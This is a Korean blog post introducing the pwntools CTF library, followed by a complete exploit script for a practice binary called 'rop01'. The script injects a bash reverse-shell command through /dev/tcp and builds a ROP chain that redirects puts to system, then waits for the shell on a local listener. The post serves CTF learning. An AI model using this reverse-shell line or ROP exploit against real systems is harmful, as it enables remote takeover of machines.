티스토리 뷰
pwntools
what?
CTP framework and explit development library.
파이썬으로 쓰여져 있음
pwn : CTF을 위한 최적화 Toolbox
pwnlib : 일반적 python library
Getting Started
1. Making connections
(1)remote
원격 host에 TCP or UDP connection 생성(supports both IPv4 and IPv6)
class : remote(host,port,fam='any',typ='tcp',ssl=False[bool],sock=None,*args,**kwargs)
>>> r = remote('google.com', 443, ssl=True)
>>> r.send('GET /\r\n\r\n')
>>> r.recvn(4)
'HTTP'
(2)listen
데이터를 받을 수 있는 TCP or UDP -socket 생성
-------------------------------------------------------python code---------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8
from pwn import *
#geting started---------------Local or remote or ssh / elf info--------------------
LOCAL = "remote" not in sys.argv #sys.argv[command line] don't have "remote"word =1
elf = ELF("./rop01") #program ELF
context.update(binary=elf) #target program info update
if LOCAL: #=LOCAL
libc = elf.libc
r = process(elf.path)
else:
libc = ELF("libc.so") #remote / ssh or remote setting
r = remote("localhost", 1337)
l = listen(1337)
#debuging--------------------------------------------------------------------------
def debug(cmd=''): #def function_name(parameter):
if "gdb" in sys.argv: #gdb
pie_base, glibc_base = r.libs()[elf.path], r.libs()[libc.path]
gdb.attach(r.proc.pid, cmd + """\nc""")
elif "strace" in sys.argv: #strace
run_in_new_terminal("strace -ff -p %d" % r.proc.pid)
time.sleep(0.5)
#----------------------------------------------------------------------------------
debug('b *0x8048701')
r.sendlineafter("What is your name?\n> ", "bash -c 'bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'\x00")
r.sendlineafter("What is your quest?\n> ", "B" * 100)
payload = flat(
"C" * 112,
# NEED CONTROL OF EBP
0x0804871a, # popad ; cld ; ret
0, # EDI
0, # ESI
elf.got['puts'] - 0xc, # EBP
"TEST",
0, # EBX
libc.symbols['system'] - libc.symbols['puts'], # EDX
0, # ECX
0, # EAX
0x0804858c, # mov eax, dword [ebp+0x0C] ; add eax, edx ; pop ebp ; ret ; (1 found)
"JUNK", # pop ebp
0x080484f1, # call eax
elf.symbols['answer1']
)
r.sendlineafter("What is the air-speed velocity of an unladen swallow?\n> ", payload)
log.info('Waiting for a shell...')
l.wait_for_connection()
l.interactive()
r.close()
'Fwnable' 카테고리의 다른 글
fwntool 정보 (0) | 2018.04.05 |
---|---|
연습용 파일 생성시 보호기법 해제해서 gccz컴파일하기 (0) | 2018.04.03 |
터미널에서 sys.arv넣기 (0) | 2018.04.02 |